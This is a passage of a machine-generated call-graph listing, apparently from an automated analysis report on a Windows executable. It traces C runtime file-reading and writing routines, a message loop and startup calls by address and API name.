EnterCriticalSection 95583->95595 95584->95581 95584->95583 95585 2aeac7 95594 2b27ec 26 API calls __fread_nolock 95585->95594 95588 2aeaf4 95596 2aec0a 62 API calls 2 library calls 95588->95596 95590 2aeb08 95597 2aeb27 LeaveCriticalSection __fread_nolock 95590->95597 95592 2aead2 __fread_nolock 95592->95579 95593->95585 95594->95592 95595->95588 95596->95590 95597->95592 95601 2ae8e1 95598->95601 95600 285118 95600->95507 95602 2ae8ed BuildCatchObjectHelperInternal 95601->95602 95603 2ae92d 95602->95603 95604 2ae900 ___scrt_fastfail 95602->95604 95606 2ae925 __fread_nolock 95602->95606 95614 2a918d EnterCriticalSection 95603->95614 95628 2af2d9 20 API calls __dosmaperr 95604->95628 95606->95600 95607 2ae937 95615 2ae6f8 95607->95615 95610 2ae91a 95629 2b27ec 26 API calls __fread_nolock 95610->95629 95614->95607 95619 2ae70a ___scrt_fastfail 95615->95619 95621 2ae727 95615->95621 95616 2ae717 95703 2af2d9 20 API calls __dosmaperr 95616->95703 95618 2ae71c 95704 2b27ec 26 API calls __fread_nolock 95618->95704 95619->95616 95619->95621 95623 2ae76a __fread_nolock 95619->95623 95630 2ae96c LeaveCriticalSection __fread_nolock 95621->95630 95622 2ae886 ___scrt_fastfail 95706 2af2d9 20 API calls __dosmaperr 95622->95706 95623->95621 95623->95622 95631 2ad955 95623->95631 95638 2b8d45 95623->95638 95705 2acf78 26 API calls 3 library calls 95623->95705 95628->95610 95629->95606 95630->95606 95632 2ad961 95631->95632 95633 2ad976 95631->95633 95707 2af2d9 20 API calls __dosmaperr 95632->95707 95633->95623 95635 2ad966 95708 2b27ec 26 API calls __fread_nolock 95635->95708 95637 2ad971 95637->95623 95639 2b8d6f 95638->95639 95640 2b8d57 95638->95640 95642 2b90d9 95639->95642 95647 2b8db4 95639->95647 95718 2af2c6 20 API calls __dosmaperr 95640->95718 95734 2af2c6 20 API calls __dosmaperr 95642->95734 95643 2b8d5c 95719 2af2d9 20 API calls __dosmaperr 95643->95719 95646 2b90de 95735 2af2d9 20 API calls __dosmaperr 95646->95735 95649 2b8dbf 95647->95649 95650 2b8d64 95647->95650 95655 2b8def 95647->95655 95720 2af2c6 20 API calls __dosmaperr 95649->95720 95650->95623 95651 2b8dcc 95736 2b27ec 26 API calls __fread_nolock 95651->95736 95653 2b8dc4 95721 2af2d9 20 API calls __dosmaperr 95653->95721 95657 2b8e08 95655->95657 95659 2b8e4a 95655->95659 95660 2b8e2e 95655->95660 95658 2b8e15 95657->95658 95657->95660 95709 2bf89b 95658->95709 95725 2b3820 21 API calls 2 library calls 95659->95725 95722 2af2c6 20 API calls __dosmaperr 95660->95722 95663 2b8e33 95723 2af2d9 20 API calls __dosmaperr 95663->95723 95664 2b8e61 95667 2b29c8 _free 20 API calls 95664->95667 95672 2b8e6a 95667->95672 95668 2b8fb3 95670 2b9029 95668->95670 95673 2b8fcc GetConsoleMode 95668->95673 95669 2b8e3a 95724 2b27ec 26 API calls __fread_nolock 95669->95724 95675 2b902d ReadFile 95670->95675 95674 2b29c8 _free 20 API calls 95672->95674 95673->95670 95676 2b8fdd 95673->95676 95677 2b8e71 95674->95677 95678 2b90a1 GetLastError 95675->95678 95679 2b9047 95675->95679 95676->95675 95681 2b8fe3 ReadConsoleW 95676->95681 95682 2b8e7b 95677->95682 95683 2b8e96 95677->95683 95684 2b90ae 95678->95684 95685 2b9005 95678->95685 95679->95678 95680 2b901e 95679->95680 95689 2b8e45 __fread_nolock 95680->95689 95696 2b906c 95680->95696 95697 2b9083 95680->95697 95681->95680 95688 2b8fff GetLastError 95681->95688 95726 2af2d9 20 API calls __dosmaperr 95682->95726 95728 2b9424 28 API calls __wsopen_s 95683->95728 95732 2af2d9 20 API calls __dosmaperr 95684->95732 95685->95689 95729 2af2a3 20 API calls __dosmaperr 95685->95729 95688->95685 95690 2b29c8 _free 20 API calls 95689->95690 95690->95650 95692 2b90b3 95733 2af2c6 20 API calls __dosmaperr 95692->95733 95694 2b8e80 95727 2af2c6 20 API calls __dosmaperr 95694->95727 95730 2b8a61 31 API calls 3 library calls 95696->95730 95697->95689 95700 2b909a 95697->95700 95731 2b88a1 29 API calls __wsopen_s 95700->95731 95702 2b909f 95702->95689 95703->95618 95704->95621 95705->95623 95706->95618 95707->95635 95708->95637 95710 2bf8a8 95709->95710 95711 2bf8b5 95709->95711 95737 2af2d9 20 API calls __dosmaperr 95710->95737 95713 2bf8c1 95711->95713 95738 2af2d9 20 API calls __dosmaperr 95711->95738 95713->95668 95715 2bf8ad 95715->95668 95716 2bf8e2 95739 2b27ec 26 API calls __fread_nolock 95716->95739 95718->95643 95719->95650 95720->95653 95721->95651 95722->95663 95723->95669 95724->95689 95725->95664 95726->95694 95727->95689 95728->95658 95729->95689 95730->95689 95731->95702 95732->95692 95733->95689 95734->95646 95735->95651 95736->95650 95737->95715 95738->95716 95739->95715 95743 2ae4e8 95740->95743 95742 2f275d 95742->95509 95746 2ae469 95743->95746 95745 2ae505 95745->95742 95747 2ae478 95746->95747 95748 2ae48c 95746->95748 95754 2af2d9 20 API calls __dosmaperr 95747->95754 95753 2ae488 __alldvrm 95748->95753 95756 2b333f 11 API calls 2 library calls 95748->95756 95750 2ae47d 95755 2b27ec 26 API calls __fread_nolock 95750->95755 95753->95745 95754->95750 95755->95753 95756->95753 95762 2f2e7a 95757->95762 95758 2f2d3b 95758->95419 95758->95437 95759 2850f5 40 API calls 95759->95762 95760 2f28fe 27 API calls 95760->95762 95761 28511f 64 API calls 95761->95762 95762->95758 95762->95759 95762->95760 95762->95761 95764 2f22d9 95763->95764 95765 2f22e7 95763->95765 95766 2ae5eb 29 API calls 95764->95766 95767 2f232c 95765->95767 95768 2ae5eb 29 API calls 95765->95768 95778 2f22f0 95765->95778 95766->95765 95792 2f2557 95767->95792 95769 2f2311 95768->95769 95769->95767 95771 2f231a 95769->95771 95775 2ae678 67 API calls 95771->95775 95771->95778 95772 2f2370 95773 2f2395 95772->95773 95774 2f2374 95772->95774 95796 2f2171 95773->95796 95777 2f2381 95774->95777 95780 2ae678 67 API calls 95774->95780 95775->95778 95777->95778 95781 2ae678 67 API calls 95777->95781 95778->95437 95779 2f239d 95782 2f23c3 95779->95782 95783 2f23a3 95779->95783 95780->95777 95781->95778 95803 2f23f3 95782->95803 95785 2f23b0 95783->95785 95786 2ae678 67 API calls 95783->95786 95785->95778 95787 2ae678 67 API calls 95785->95787 95786->95785 95787->95778 95788 2f23de 95788->95778 95791 2ae678 67 API calls 95788->95791 95789 2f23ca 95789->95788 95811 2ae678 95789->95811 95791->95778 95793 2f257c 95792->95793 95795 2f2565 __fread_nolock 95792->95795 95794 2ae8c4 __fread_nolock 40 API calls 95793->95794 95794->95795 95795->95772 95797 2aea0c ___std_exception_copy 21 API calls 95796->95797 95798 2f217f 95797->95798 95799 2aea0c ___std_exception_copy 21 API calls 95798->95799 95800 2f2190 95799->95800 95801 2aea0c ___std_exception_copy 21 API calls 95800->95801 95802 2f219c 95801->95802 95802->95779 95807 2f2408 95803->95807 95804 2f24c0 95824 2f2724 95804->95824 95805 2f21cc 40 API calls 95805->95807 95807->95804 95807->95805 95810 2f24c7 95807->95810 95828 2f2269 40 API calls 95807->95828 95829 2f2606 65 API calls 95807->95829 95810->95789 95812 2ae684 BuildCatchObjectHelperInternal 95811->95812 95813 2ae6aa 95812->95813 95814 2ae695 95812->95814 95823 2ae6a5 __fread_nolock 95813->95823 95882 2a918d EnterCriticalSection 95813->95882 95899 2af2d9 20 API calls __dosmaperr 95814->95899 95816 2ae69a 95900 2b27ec 26 API calls __fread_nolock 95816->95900 95819 2ae6c6 95883 2ae602 95819->95883 95821 2ae6d1 95901 2ae6ee LeaveCriticalSection __fread_nolock 95821->95901 95823->95788 95825 2f2742 95824->95825 95826 2f2731 95824->95826 95825->95810 95830 2adbb3 95826->95830 95828->95807 95829->95807 95831 2adbdd 95830->95831 95832 2adbc1 95830->95832 95831->95825 95832->95831 95833 2adbcd 95832->95833 95834 2adbe3 95832->95834 95842 2af2d9 20 API calls __dosmaperr 95833->95842 95839 2ad9cc 95834->95839 95837 2adbd2 95843 2b27ec 26 API calls __fread_nolock 95837->95843 95844 2ad97b 95839->95844 95841 2ad9f0 95841->95831 95842->95837 95843->95831 95845 2ad987 BuildCatchObjectHelperInternal 95844->95845 95852 2a918d EnterCriticalSection 95845->95852 95847 2ad995 95853 2ad9f4 95847->95853 95851 2ad9b3 __fread_nolock 95851->95841 95852->95847 95861 2b49a1 95853->95861 95859 2ad9a2 95860 2ad9c0 LeaveCriticalSection __fread_nolock 95859->95860 95860->95851 95862 2ad955 __fread_nolock 26 API calls 95861->95862 95863 2b49b0 95862->95863 95864 2bf89b __fread_nolock 26 API calls 95863->95864 95866 2b49b6 95864->95866 95865 2ada09 95870 2ada3a 95865->95870 95866->95865 95867 2b3820 _strftime 21 API calls 95866->95867 95868 2b4a15 95867->95868 95869 2b29c8 _free 20 API calls 95868->95869 95869->95865 95873 2ada4c 95870->95873 95877 2ada24 95870->95877 95871 2ada5a 95872 2af2d9 __dosmaperr 20 API calls 95871->95872 95874 2ada5f 95872->95874 95873->95871 95875 2ada85 __fread_nolock 95873->95875 95873->95877 95876 2b27ec __fread_nolock 26 API calls 95874->95876 95875->95877 95878 2adc0b 62 API calls 95875->95878 95879 2ad955 __fread_nolock 26 API calls 95875->95879 95880 2b59be __wsopen_s 62 API calls 95875->95880 95876->95877 95881 2b4a56 62 API calls 95877->95881 95878->95875 95879->95875 95880->95875 95881->95859 95882->95819 95884 2ae60f 95883->95884 95885 2ae624 95883->95885 95927 2af2d9 20 API calls __dosmaperr 95884->95927 95897 2ae61f 95885->95897 95902 2adc0b 95885->95902 95888 2ae614 95928 2b27ec 26 API calls __fread_nolock 95888->95928 95893 2ad955 __fread_nolock 26 API calls 95894 2ae646 95893->95894 95912 2b862f 95894->95912 95897->95821 95898 2b29c8 _free 20 API calls 95898->95897 95899->95816 95900->95823 95901->95823 95903 2adc1f 95902->95903 95904 2adc23 95902->95904 95908 2b4d7a 95903->95908 95904->95903 95905 2ad955 __fread_nolock 26 API calls 95904->95905 95906 2adc43 95905->95906 95929 2b59be 95906->95929 95909 2b4d90 95908->95909 95910 2ae640 95908->95910 95909->95910 95911 2b29c8 _free 20 API calls 95909->95911 95910->95893 95911->95910 95913 2b863e 95912->95913 95914 2b8653 95912->95914 96052 2af2c6 20 API calls __dosmaperr 95913->96052 95915 2b868e 95914->95915 95920 2b867a 95914->95920 96054 2af2c6 20 API calls __dosmaperr 95915->96054 95917 2b8643 96053 2af2d9 20 API calls __dosmaperr 95917->96053 96049 2b8607 95920->96049 95921 2b8693 96055 2af2d9 20 API calls __dosmaperr 95921->96055 95924 2ae64c 95924->95897 95924->95898 95925 2b869b 96056 2b27ec 26 API calls __fread_nolock 95925->96056 95927->95888 95928->95897 95930 2b59ca BuildCatchObjectHelperInternal 95929->95930 95931 2b59ea 95930->95931 95932 2b59d2 95930->95932 95934 2b5a88 95931->95934 95939 2b5a1f 95931->95939 96008 2af2c6 20 API calls __dosmaperr 95932->96008 96013 2af2c6 20 API calls __dosmaperr 95934->96013 95935 2b59d7 96009 2af2d9 20 API calls __dosmaperr 95935->96009 95938 2b5a8d 96014 2af2d9 20 API calls __dosmaperr 95938->96014 95954 2b5147 EnterCriticalSection 95939->95954 95940 2b59df __fread_nolock 95940->95903 95943 2b5a95 96015 2b27ec 26 API calls __fread_nolock 95943->96015 95944 2b5a25 95946 2b5a41 95944->95946 95947 2b5a56 95944->95947 96010 2af2d9 20 API calls __dosmaperr 95946->96010 95955 2b5aa9 95947->95955 95950 2b5a46 96011 2af2c6 20 API calls __dosmaperr 95950->96011 95951 2b5a51 96012 2b5a80 LeaveCriticalSection __wsopen_s 95951->96012 95954->95944 95956 2b5ad7 95955->95956 95993 2b5ad0 95955->95993 95957 2b5adb 95956->95957 95958 2b5afa 95956->95958 96023 2af2c6 20 API calls __dosmaperr 95957->96023 95962 2b5b4b 95958->95962 95963 2b5b2e 95958->95963 95961 2b5ae0 96024 2af2d9 20 API calls __dosmaperr 95961->96024 95966 2b5b61 95962->95966 96029 2b9424 28 API calls __wsopen_s 95962->96029 96026 2af2c6 20 API calls __dosmaperr 95963->96026 95964 2b5cb1 95964->95951 96016 2b564e 95966->96016 95968 2b5ae7 96025 2b27ec 26 API calls __fread_nolock 95968->96025 95971 2b5b33 96027 2af2d9 20 API calls __dosmaperr 95971->96027 95975 2b5ba8 95979 2b5bbc 95975->95979 95980 2b5c02 WriteFile 95975->95980 95976 2b5b6f 95981 2b5b73 95976->95981 95982 2b5b95 95976->95982 95977 2b5b3b 96028 2b27ec 26 API calls __fread_nolock 95977->96028 95985 2b5bf2 95979->95985 95986 2b5bc4 95979->95986 95983 2b5c25 GetLastError 95980->95983 95988 2b5b8b 95980->95988 95987 2b5c69 95981->95987 96030 2b55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 95981->96030 96031 2b542e 45 API calls 3 library calls 95982->96031 95983->95988 96034 2b56c4 7 API calls 2 library calls 95985->96034 95989 2b5bc9 95986->95989 95990 2b5be2 95986->95990 95987->95993 96038 2af2d9 20 API calls __dosmaperr 95987->96038 95988->95987 95988->95993 95999 2b5c45 95988->95999 95989->95987 95995 2b5bd2 95989->95995 96033 2b5891 8 API calls 2 library calls 95990->96033 96040 2a0a8c 95993->96040 96032 2b57a3 7 API calls 2 library calls 95995->96032 95997 2b5be0 95997->95988 95998 2b5c8e 96039 2af2c6 20 API calls __dosmaperr 95998->96039 96002 2b5c4c 95999->96002 96003 2b5c60 95999->96003 96035 2af2d9 20 API calls __dosmaperr 96002->96035 96037 2af2a3 20 API calls __dosmaperr 96003->96037 96006 2b5c51 96036 2af2c6 20 API calls __dosmaperr 96006->96036 96008->95935 96009->95940 96010->95950 96011->95951 96012->95940 96013->95938 96014->95943 96015->95940 96017 2bf89b __fread_nolock 26 API calls 96016->96017 96018 2b565e 96017->96018 96019 2b5663 96018->96019 96047 2b2d74 38 API calls 3 library calls 96018->96047 96019->95975 96019->95976 96021 2b5686 96021->96019 96022 2b56a4 GetConsoleMode 96021->96022 96022->96019 96023->95961 96024->95968 96025->95993 96026->95971 96027->95977 96028->95993 96029->95966 96030->95988 96031->95988 96032->95997 96033->95997 96034->95997 96035->96006 96036->95993 96037->95993 96038->95998 96039->95993 96041 2a0a97 IsProcessorFeaturePresent 96040->96041 96042 2a0a95 96040->96042 96044 2a0c5d 96041->96044 96042->95964 96048 2a0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96044->96048 96046 2a0d40 96046->95964 96047->96021 96048->96046 96057 2b8585 96049->96057 96051 2b862b 96051->95924 96052->95917 96053->95924 96054->95921 96055->95925 96056->95924 96058 2b8591 BuildCatchObjectHelperInternal 96057->96058 96068 2b5147 EnterCriticalSection 96058->96068 96060 2b859f 96061 2b85d1 96060->96061 96062 2b85c6 96060->96062 96069 2af2d9 20 API calls __dosmaperr 96061->96069 96063 2b86ae __wsopen_s 29 API calls 96062->96063 96065 2b85cc 96063->96065 96070 2b85fb LeaveCriticalSection __wsopen_s 96065->96070 96067 2b85ee __fread_nolock 96067->96051 96068->96060 96069->96065 96070->96067 96071 281044 96076 2810f3 96071->96076 96073 28104a 96112 2a00a3 29 API calls __onexit 96073->96112 96075 281054 96113 281398 96076->96113 96080 28116a 96081 28a961 22 API calls 96080->96081 96082 281174 96081->96082 96083 28a961 22 API calls 96082->96083 96084 28117e 96083->96084 96085 28a961 22 API calls 96084->96085 96086 281188 96085->96086 96087 28a961 22 API calls 96086->96087 96088 2811c6 96087->96088 96089 28a961 22 API calls 96088->96089 96090 281292 96089->96090 96123 28171c 96090->96123 96094 2812c4 96095 28a961 22 API calls 96094->96095 96096 2812ce 96095->96096 96144 291940 96096->96144 96098 2812f9 96154 281aab 96098->96154 96100 281315 96101 281325 GetStdHandle 96100->96101 96102 28137a 96101->96102 96103 2c2485 96101->96103 96106 281387 OleInitialize 96102->96106 96103->96102 96104 2c248e 96103->96104 96105 29fddb 22 API calls 96104->96105 96107 2c2495 96105->96107 96106->96073 96161 2f011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96107->96161 96109 2c249e 96162 2f0944 CreateThread 96109->96162 96111 2c24aa CloseHandle 96111->96102 96112->96075 96163 2813f1 96113->96163 96116 2813f1 22 API calls 96117 2813d0 96116->96117 96118 28a961 22 API calls 96117->96118 96119 2813dc 96118->96119 96120 286b57 22 API calls 96119->96120 96121 281129 96120->96121 96122 281bc3 6 API calls 96121->96122 96122->96080 96124 28a961 22 API calls 96123->96124 96125 28172c 96124->96125 96126 28a961 22 API calls 96125->96126 96127 281734 96126->96127 96128 28a961 22 API calls 96127->96128 96129 28174f 96128->96129 96130 29fddb 22 API calls 96129->96130 96131 28129c 96130->96131 96132 281b4a 96131->96132 96133 281b58 96132->96133 96134 28a961 22 API calls 96133->96134 96135 281b63 96134->96135 96136 28a961 22 API calls 96135->96136 96137 281b6e 96136->96137 96138 28a961 22 API calls 96137->96138 96139 281b79 96138->96139 96140 28a961 22 API calls 96139->96140 96141 281b84 96140->96141 96142 29fddb 22 API calls 96141->96142 96143 281b96 RegisterWindowMessageW 96142->96143 96143->96094 96145 291981 96144->96145 96146 29195d 96144->96146 96170 2a0242 5 API calls __Init_thread_wait 96145->96170 96147 29196e 96146->96147 96172 2a0242 5 API calls __Init_thread_wait 96146->96172 96147->96098 96150 29198b 96150->96146 96171 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96150->96171 96151 298727 96151->96147 96173 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96151->96173 96155 2c272d 96154->96155 96156 281abb 96154->96156 96174 2f3209 23 API calls 96155->96174 96157 29fddb 22 API calls 96156->96157 96159 281ac3 96157->96159 96159->96100 96160 2c2738 96161->96109 96162->96111 96175 2f092a 28 API calls 96162->96175 96164 28a961 22 API calls 96163->96164 96165 2813fc 96164->96165 96166 28a961 22 API calls 96165->96166 96167 281404 96166->96167 96168 28a961 22 API calls 96167->96168 96169 2813c6 96168->96169 96169->96116 96170->96150 96171->96146 96172->96151 96173->96147 96174->96160 96176 2d2a00 96191 28d7b0 messages 96176->96191 96177 28db11 PeekMessageW 96177->96191 96178 28d807 GetInputState 96178->96177 96178->96191 96179 2d1cbe TranslateAcceleratorW 96179->96191 96181 28db8f PeekMessageW 96181->96191 96182 28da04 timeGetTime 96182->96191 96183 28db73 TranslateMessage DispatchMessageW 96183->96181 96184 28dbaf Sleep 96202 28dbc0 96184->96202 96185 2d2b74 Sleep 96185->96202 96186 29e551 timeGetTime 96186->96202 96187 2d1dda timeGetTime 96354 29e300 23 API calls 96187->96354 96190 2d2c0b GetExitCodeProcess 96195 2d2c37 CloseHandle 96190->96195 96196 2d2c21 WaitForSingleObject 96190->96196 96191->96177 96191->96178 96191->96179 96191->96181 96191->96182 96191->96183 96191->96184 96191->96185 96191->96187 96194 28d9d5 96191->96194 96208 28dd50 96191->96208 96215 28dfd0 96191->96215 96238 291310 96191->96238 96295 28bf40 96191->96295 96353 29edf6 IsDialogMessageW GetClassLongW 96191->96353 96355 2f3a2a 23 API calls 96191->96355 96356 28ec40 96191->96356 96380 2f359c 82 API calls __wsopen_s 96191->96380 96192 3129bf GetForegroundWindow 96192->96202 96195->96202 96196->96191 96196->96195 96197 2d2a31 96197->96194 96198 2d2ca9 Sleep 96198->96191 96202->96186 96202->96190 96202->96191 96202->96192 96202->96194 96202->96197 96202->96198 96381 305658 23 API calls 96202->96381 96382 2ee97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96202->96382 96383 2ed4dc 47 API calls 96202->96383 96209 28dd6f 96208->96209 96211 28dd83 96208->96211 96384 28d260 235 API calls 2 library calls 96209->96384 96385 2f359c 82 API calls __wsopen_s 96211->96385 96212 28dd7a 96212->96191 96214 2d2f75 96214->96214 96216 28e010 96215->96216 96234 28e0dc messages 96216->96234 96388 2a0242 5 API calls __Init_thread_wait 96216->96388 96219 2d2fca 96222 28a961 22 API calls 96219->96222 96219->96234 96220 28a961 22 API calls 96220->96234 96221 2f359c 82 API calls 96221->96234 96223 2d2fe4 96222->96223 96389 2a00a3 29 API calls __onexit 96223->96389 96227 2d2fee 96390 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96227->96390 96230 28ec40 235 API calls 96230->96234 96232 28a8c7 22 API calls 96232->96234 96233 2904f0 22 API calls 96233->96234 96234->96220 96234->96221 96234->96230 96234->96232 96234->96233 96235 28e3e1 96234->96235 96386 28a81b 41 API calls 96234->96386 96387 29a308 235 API calls 96234->96387 96391 2a0242 5 API calls __Init_thread_wait 96234->96391 96392 2a00a3 29 API calls __onexit 96234->96392 96393 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96234->96393 96394 3047d4 235 API calls 96234->96394 96395 3068c1 235 API calls 96234->96395 96235->96191 96239 2917b0 96238->96239 96240 291376 96238->96240 96495 2a0242 5 API calls __Init_thread_wait 96239->96495 96241 291390 96240->96241 96242 2d6331 96240->96242 96244 291940 9 API calls 96241->96244 96500 30709c 235 API calls 96242->96500 96247 2913a0 96244->96247 96246 2917ba 96249 2917fb 96246->96249 96251 289cb3 22 API calls 96246->96251 96250 291940 9 API calls 96247->96250 96248 2d633d 96248->96191 96253 2d6346 96249->96253 96255 29182c 96249->96255 96252 2913b6 96250->96252 96258 2917d4 96251->96258 96252->96249 96254 2913ec 96252->96254 96501 2f359c 82 API calls __wsopen_s 96253->96501 96254->96253 96278 291408 __fread_nolock 96254->96278 96497 28aceb 23 API calls messages 96255->96497 96496 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96258->96496 96259 291839 96498 29d217 235 API calls 96259->96498 96262 2d636e 96502 2f359c 82 API calls __wsopen_s 96262->96502 96263 29152f 96265 29153c 96263->96265 96266 2d63d1 96263->96266 96268 291940 9 API calls 96265->96268 96504 305745 54 API calls _wcslen 96266->96504 96269 291549 96268->96269 96273 2d64fa 96269->96273 96275 291940 9 API calls 96269->96275 96270 29fddb 22 API calls 96270->96278 96271 291872 96499 29faeb 23 API calls 96271->96499 96272 29fe0b 22 API calls 96272->96278 96282 2d6369 96273->96282 96505 2f359c 82 API calls __wsopen_s 96273->96505 96280 291563 96275->96280 96277 28ec40 235 API calls 96277->96278 96278->96259 96278->96262 96278->96263 96278->96270 96278->96272 96278->96277 96279 2d63b2 96278->96279 96278->96282 96503 2f359c 82 API calls __wsopen_s 96279->96503 96280->96273 96283 28a8c7 22 API calls 96280->96283 96285 2915c7 messages 96280->96285 96282->96191 96283->96285 96284 291940 9 API calls 96284->96285 96285->96271 96285->96273 96285->96282 96285->96284 96287 29167b messages 96285->96287 96290 284f39 68 API calls 96285->96290 96396 2ed4ce 96285->96396 96399 30959f 96285->96399 96402 2ff0ec 96285->96402 96411 2f6ef1 96285->96411 96491 30958b 96285->96491 96286 29171d 96286->96191 96287->96286 96494 29ce17 22 API calls messages 96287->96494 96290->96285 96846 28adf0 96295->96846 96297 28bf9d 96298 28bfa9 96297->96298 96299 2d04b6 96297->96299 96301 2d04c6 96298->96301 96302 28c01e 96298->96302 96865 2f359c 82 API calls __wsopen_s 96299->96865 96866 2f359c 82 API calls __wsopen_s 96301->96866 96851 28ac91 96302->96851 96306 2e7120 22 API calls 96350 28c039 __fread_nolock messages 96306->96350 96307 28c7da 96310 29fe0b 22 API calls 96307->96310 96316 28c808 __fread_nolock 96310->96316 96312 2d04f5 96317 2d055a 96312->96317 96867 29d217 235 API calls 96312->96867 96315 29fddb 22 API calls 96315->96350 96319 29fe0b 22 API calls 96316->96319 96339 28c603 96317->96339 96868 2f359c 82 API calls __wsopen_s 96317->96868 96318 28ec40 235 API calls 96318->96350 96349 28c350 __fread_nolock messages 96319->96349 96320 28af8a 22 API calls 96320->96350 96321 2d091a 96878 2f3209 23 API calls 96321->96878 96324 2d08a5 96325 28ec40 235 API calls 96324->96325 96326 2d08cf 96325->96326 96326->96339 96876 28a81b 41 API calls 96326->96876 96328 2d0591 96869 2f359c 82 API calls __wsopen_s 96328->96869 96332 2d08f6 96877 2f359c 82 API calls __wsopen_s 96332->96877 96334 28bbe0 40 API calls 96334->96350 96336 28c237 96337 28c253 96336->96337 96338 28a8c7 22 API calls 96336->96338 96340 2d0976 96337->96340 96344 28c297 messages 96337->96344 96338->96337 96339->96191 96879 28aceb 23 API calls messages 96340->96879 96343 2d09bf 96343->96339 96880 2f359c 82 API calls __wsopen_s 96343->96880 96344->96343 96862 28aceb 23 API calls messages 96344->96862 96346 28c335 96346->96343 96347 28c342 96346->96347 96863 28a704 22 API calls messages 96347->96863 96352 28c3ac 96349->96352 96864 29ce17 22 API calls messages 96349->96864 96350->96306 96350->96307 96350->96312 96350->96315 96350->96316 96350->96317 96350->96318 96350->96320 96350->96321 96350->96324 96350->96328 96350->96332 96350->96334 96350->96336 96350->96339 96350->96343 96351 29fe0b 22 API calls 96350->96351 96855 28ad81 96350->96855 96870 2e7099 22 API calls __fread_nolock 96350->96870 96871 305745 54 API calls _wcslen 96350->96871 96872 29aa42 22 API calls messages 96350->96872 96873 2ef05c 40 API calls 96350->96873 96874 28a993 41 API calls 96350->96874 96875 28aceb 23 API calls messages 96350->96875 96351->96350 96352->96191 96353->96191 96354->96191 96355->96191 96378 28ec76 messages 96356->96378 96357 29fddb 22 API calls 96357->96378 96359 28fef7 96365 28a8c7 22 API calls 96359->96365 96373 28ed9d messages 96359->96373 96361 28f3ae messages 96361->96373 96891 2f359c 82 API calls __wsopen_s 96361->96891 96362 2d4600 96368 28a8c7 22 API calls 96362->96368 96362->96373 96363 2d4b0b 96892 2f359c 82 API calls __wsopen_s 96363->96892 96364 28a8c7 22 API calls 96364->96378 96365->96373 96368->96373 96370 2a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96370->96378 96371 28fbe3 96371->96361 96371->96373 96374 2d4bdc 96371->96374 96372 28a961 22 API calls 96372->96378 96373->96191 96893 2f359c 82 API calls __wsopen_s 96374->96893 96375 2a00a3 29 API calls pre_c_initialization 96375->96378 96377 2d4beb 96894 2f359c 82 API calls __wsopen_s 96377->96894 96378->96357 96378->96359 96378->96361 96378->96362 96378->96363 96378->96364 96378->96370 96378->96371 96378->96372 96378->96373 96378->96375 96378->96377 96379 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96378->96379 96889 2901e0 235 API calls 2 library calls 96378->96889 96890 2906a0 41 API calls messages 96378->96890 96379->96378 96380->96191 96381->96202 96382->96202 96383->96202 96384->96212 96385->96214 96386->96234 96387->96234 96388->96219 96389->96227 96390->96234 96391->96234 96392->96234 96393->96234 96394->96234 96395->96234 96506 2edbbe lstrlenW 96396->96506 96511 307f59 96399->96511 96401 3095af 96401->96285 96403 287510 53 API calls 96402->96403 96404 2ff126 96403->96404 96644 289e90 96404->96644 96406 2ff136 96407 2ff15b 96406->96407 96408 28ec40 235 API calls 96406->96408 96410 2ff15f 96407->96410 96672 289c6e 22 API calls 96407->96672 96408->96407 96410->96285 96412 28a961 22 API calls 96411->96412 96413 2f6f1d 96412->96413 96414 28a961 22 API calls 96413->96414 96415 2f6f26 96414->96415 96416 2f6f3a 96415->96416 96834 28b567 39 API calls 96415->96834 96418 287510 53 API calls 96416->96418 96419 2f6f57 _wcslen 96418->96419 96420 2f70bf 96419->96420 96421 2f6fbc 96419->96421 96431 2f70e9 96419->96431 96423 284ecb 94 API calls 96420->96423 96422 287510 53 API calls 96421->96422 96425 2f6fc8 96422->96425 96424 2f70d0 96423->96424 96426 2f70e5 96424->96426 96427 284ecb 94 API calls 96424->96427 96429 28a8c7 22 API calls 96425->96429 96432 2f6fdb 96425->96432 96428 28a961 22 API calls 96426->96428 96426->96431 96427->96426 96430 2f711a 96428->96430 96429->96432 96434 28a961 22 API calls 96430->96434 96431->96285 96433 2f7027 96432->96433 96435 2f7005 96432->96435 96438 28a8c7 22 API calls 96432->96438 96436 287510 53 API calls 96433->96436 96437 2f7126 96434->96437 96439 2833c6 22 API calls 96435->96439 96440 2f7034 96436->96440 96441 28a961 22 API calls 96437->96441 96438->96435 96442 2f700f 96439->96442 96443 2f703d 96440->96443 96444 2f7047 96440->96444 96445 2f712f 96441->96445 96447 287510 53 API calls 96442->96447 96448 28a8c7 22 API calls 96443->96448 96835 2ee199 GetFileAttributesW 96444->96835 96446 28a961 22 API calls 96445->96446 96451 2f7138 96446->96451 96452 2f701b 96447->96452 96448->96444 96450 2f7050 96453 2f7063 96450->96453 96456 284c6d 22 API calls 96450->96456 96454 287510 53 API calls 96451->96454 96455 286350 22 API calls 96452->96455 96458 287510 53 API calls 96453->96458 96464 2f7069 96453->96464 96457 2f7145 96454->96457 96455->96433 96456->96453 96680 28525f 96457->96680 96460 2f70a0 96458->96460 96836 2ed076 57 API calls 96460->96836 96461 2f7166 96722 284c6d 96461->96722 96464->96431 96466 2f71a9 96467 28a8c7 22 API calls 96466->96467 96469 2f71ba 96467->96469 96468 284c6d 22 API calls 96470 2f7186 96468->96470 96471 286350 22 API calls 96469->96471 96470->96466 96473 286b57 22 API calls 96470->96473 96472 2f71c8 96471->96472 96474 286350 22 API calls 96472->96474 96475 2f719b 96473->96475 96476 2f71d6 96474->96476 96477 286b57 22 API calls 96475->96477 96478 286350 22 API calls 96476->96478 96477->96466 96479 2f71e4 96478->96479 96480 287510 53 API calls 96479->96480 96481 2f71f0 96480->96481 96725 2ed7bc 96481->96725 96483 2f7201 96484 2ed4ce 4 API calls 96483->96484 96485 